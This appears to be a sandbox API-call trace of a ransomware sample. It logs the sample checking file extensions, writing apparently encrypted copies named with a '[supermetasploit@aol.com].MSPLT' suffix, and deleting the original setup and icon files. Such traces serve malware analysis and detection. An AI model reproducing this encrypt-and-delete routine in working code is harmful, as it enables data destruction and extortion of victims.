1 [0171.874] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 1 [0171.874] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.874] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.874] lstrlenW (lpString=".doc") returned 4 [0171.874] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.874] lstrlenW (lpString=".docx") returned 5 [0171.874] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.875] lstrlenW (lpString=".pdf") returned 4 [0171.875] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.875] lstrlenW (lpString=".xls") returned 4 [0171.875] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.875] lstrlenW (lpString=".xlsx") returned 5 [0171.875] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.875] lstrlenW (lpString=".ppt") returned 4 [0171.875] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.875] lstrlenW (lpString=".zip") returned 4 [0171.875] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.875] lstrlenW (lpString=".rar") returned 4 [0171.875] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.875] lstrlenW (lpString=".bz2") returned 4 [0171.875] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.875] lstrlenW (lpString=".7z") returned 3 [0171.875] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.875] lstrlenW (lpString=".dbf") returned 4 [0171.875] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.875] lstrlenW (lpString=".1cd") returned 4 [0171.875] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.875] lstrlenW (lpString=".jpg") returned 4 [0171.875] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.875] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.876] lstrlenW (lpString=".doc") returned 4 [0171.876] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.876] lstrlenW (lpString=".docx") returned 5 [0171.876] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.876] lstrlenW (lpString=".pdf") returned 4 [0171.876] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.876] lstrlenW (lpString=".xls") returned 4 [0171.876] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.876] lstrlenW (lpString=".xlsx") returned 5 [0171.876] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.876] lstrlenW (lpString=".ppt") returned 4 [0171.876] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.876] lstrlenW (lpString=".zip") returned 4 [0171.876] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.876] lstrlenW (lpString=".rar") returned 4 [0171.876] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.876] lstrlenW (lpString=".bz2") returned 4 [0171.876] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.876] lstrlenW (lpString=".7z") returned 3 [0171.876] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.876] lstrlenW (lpString=".dbf") returned 4 [0171.876] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.876] lstrlenW (lpString=".1cd") returned 4 [0171.876] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.876] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0171.877] lstrlenW (lpString=".jpg") returned 4 [0171.877] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.877] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.877] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.877] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.877] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=18264) returned 1 [0171.877] CloseHandle (hObject=0x344) returned 1 [0171.877] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 0x80 [0171.877] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.878] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.878] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.878] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.878] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0171.878] GetLastError () returned 0x0 [0171.878] ReadFile (in: hFile=0x344, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x4758, lpOverlapped=0x0) returned 1 [0172.229] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x4760, lpOverlapped=0x0) returned 1 [0172.230] ReadFile (in: hFile=0x344, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0172.231] WriteFile (in: hFile=0x348, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.231] SetEndOfFile (hFile=0x348) returned 1 [0172.231] CloseHandle (hObject=0x348) returned 1 [0172.236] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.236] SetEndOfFile (hFile=0x344) returned 1 [0172.238] CloseHandle (hObject=0x344) returned 1 [0172.238] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.238] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 1 [0172.733] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.733] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.733] lstrlenW (lpString=".doc") returned 4 [0172.733] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.733] lstrlenW (lpString=".docx") returned 5 [0172.734] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.734] lstrlenW (lpString=".pdf") returned 4 [0172.734] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString=".xls") returned 4 [0172.734] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString=".xlsx") returned 5 [0172.734] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.734] lstrlenW (lpString=".ppt") returned 4 [0172.734] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.734] lstrlenW (lpString=".zip") returned 4 [0172.734] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString=".rar") returned 4 [0172.734] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString=".bz2") returned 4 [0172.734] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.734] lstrlenW (lpString=".7z") returned 3 [0172.734] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.734] lstrlenW (lpString=".dbf") returned 4 [0172.734] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.734] lstrlenW (lpString=".1cd") returned 4 [0172.734] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.734] lstrlenW (lpString=".jpg") returned 4 [0172.734] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.734] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.734] lstrlenW (lpString=".doc") returned 4 [0172.734] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.734] lstrlenW (lpString=".docx") returned 5 [0172.734] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.734] lstrlenW (lpString=".pdf") returned 4 [0172.735] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.735] lstrlenW (lpString=".xls") returned 4 [0172.735] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.735] lstrlenW (lpString=".xlsx") returned 5 [0172.735] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.735] lstrlenW (lpString=".ppt") returned 4 [0172.735] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.735] lstrlenW (lpString=".zip") returned 4 [0172.735] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.735] lstrlenW (lpString=".rar") returned 4 [0172.735] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.735] lstrlenW (lpString=".bz2") returned 4 [0172.735] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.735] lstrlenW (lpString=".7z") returned 3 [0172.735] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.735] lstrlenW (lpString=".dbf") returned 4 [0172.735] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.735] lstrlenW (lpString=".1cd") returned 4 [0172.735] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.735] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0172.735] lstrlenW (lpString=".jpg") returned 4 [0172.735] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.735] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.735] lstrlenW (lpString="Rotate3.ico") returned 11 [0172.735] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.908] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=894) returned 1 [0172.908] CloseHandle (hObject=0x2e8) returned 1 [0172.908] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 0x80 [0172.908] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.908] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.908] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.908] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.908] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0172.909] GetLastError () returned 0x0 [0172.909] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x37e, lpOverlapped=0x0) returned 1 [0172.961] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x380, lpOverlapped=0x0) returned 1 [0172.962] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0172.962] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xea, lpOverlapped=0x0) returned 1 [0172.962] SetEndOfFile (hFile=0x2d4) returned 1 [0172.962] CloseHandle (hObject=0x2d4) returned 1 [0172.967] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.967] SetEndOfFile (hFile=0x2e8) returned 1 [0172.968] CloseHandle (hObject=0x2e8) returned 1 [0172.968] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.969] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 1 [0172.969] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.969] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.969] lstrlenW (lpString=".doc") returned 4 [0172.969] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0172.969] lstrlenW (lpString=".docx") returned 5 [0172.969] lstrcmpiW (lpString1=".docx", lpString2="3.ico") returned -1 [0172.969] lstrlenW (lpString=".pdf") returned 4 [0172.969] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0172.969] lstrlenW (lpString=".xls") returned 4 [0172.969] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0172.969] lstrlenW (lpString=".xlsx") returned 5 [0172.970] lstrcmpiW (lpString1=".xlsx", lpString2="3.ico") returned -1 [0172.970] lstrlenW (lpString=".ppt") returned 4 [0172.970] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0172.970] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.970] lstrlenW (lpString=".zip") returned 4 [0172.970] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0172.970] lstrlenW (lpString=".rar") returned 4 [0172.970] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0172.970] lstrlenW (lpString=".bz2") returned 4 [0172.970] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0172.970] lstrlenW (lpString=".7z") returned 3 [0172.970] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0172.970] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.970] lstrlenW (lpString=".dbf") returned 4 [0172.970] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0172.970] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.970] lstrlenW (lpString=".1cd") returned 4 [0172.970] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0172.970] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.970] lstrlenW (lpString=".jpg") returned 4 [0172.970] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0172.970] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.970] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.970] lstrlenW (lpString=".doc") returned 4 [0172.970] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0172.970] lstrlenW (lpString=".docx") returned 5 [0172.970] lstrcmpiW (lpString1=".docx", lpString2="3.ico") returned -1 [0172.971] lstrlenW (lpString=".pdf") returned 4 [0172.971] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0172.971] lstrlenW (lpString=".xls") returned 4 [0172.971] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0172.971] lstrlenW (lpString=".xlsx") returned 5 [0172.971] lstrcmpiW (lpString1=".xlsx", lpString2="3.ico") returned -1 [0172.971] lstrlenW (lpString=".ppt") returned 4 [0172.971] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0172.971] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.971] lstrlenW (lpString=".zip") returned 4 [0172.971] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0172.971] lstrlenW (lpString=".rar") returned 4 [0172.971] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0172.971] lstrlenW (lpString=".bz2") returned 4 [0172.971] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0172.971] lstrlenW (lpString=".7z") returned 3 [0172.971] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0172.971] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.971] lstrlenW (lpString=".dbf") returned 4 [0172.971] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0172.971] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.971] lstrlenW (lpString=".1cd") returned 4 [0172.971] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0172.971] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0172.971] lstrlenW (lpString=".jpg") returned 4 [0172.971] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0172.972] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.972] lstrlenW (lpString="Rotate5.ico") returned 11 [0172.972] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.972] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=894) returned 1 [0172.973] CloseHandle (hObject=0x2e8) returned 1 [0172.973] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 0x80 [0172.973] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.973] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0172.973] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.973] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.973] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0172.973] GetLastError () returned 0x0 [0172.974] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x37e, lpOverlapped=0x0) returned 1 [0173.000] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x380, lpOverlapped=0x0) returned 1 [0173.001] ReadFile (in: hFile=0x2e8, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0173.002] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xea, lpOverlapped=0x0) returned 1 [0173.002] SetEndOfFile (hFile=0x2d4) returned 1 [0173.002] CloseHandle (hObject=0x2d4) returned 1 [0173.003] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.003] SetEndOfFile (hFile=0x2e8) returned 1 [0173.004] CloseHandle (hObject=0x2e8) returned 1 [0173.004] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0173.004] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 1 [0173.004] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString=".doc") returned 4 [0173.005] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.005] lstrlenW (lpString=".docx") returned 5 [0173.005] lstrcmpiW (lpString1=".docx", lpString2="5.ico") returned -1 [0173.005] lstrlenW (lpString=".pdf") returned 4 [0173.005] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.005] lstrlenW (lpString=".xls") returned 4 [0173.005] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.005] lstrlenW (lpString=".xlsx") returned 5 [0173.005] lstrcmpiW (lpString1=".xlsx", lpString2="5.ico") returned -1 [0173.005] lstrlenW (lpString=".ppt") returned 4 [0173.005] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString=".zip") returned 4 [0173.005] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.005] lstrlenW (lpString=".rar") returned 4 [0173.005] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.005] lstrlenW (lpString=".bz2") returned 4 [0173.005] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.005] lstrlenW (lpString=".7z") returned 3 [0173.005] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString=".dbf") returned 4 [0173.005] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString=".1cd") returned 4 [0173.005] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString=".jpg") returned 4 [0173.005] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 42 [0173.005] lstrlenW (lpString=".doc") returned 4 [0173.006] lstrcmpiW (lpString1=".doc", 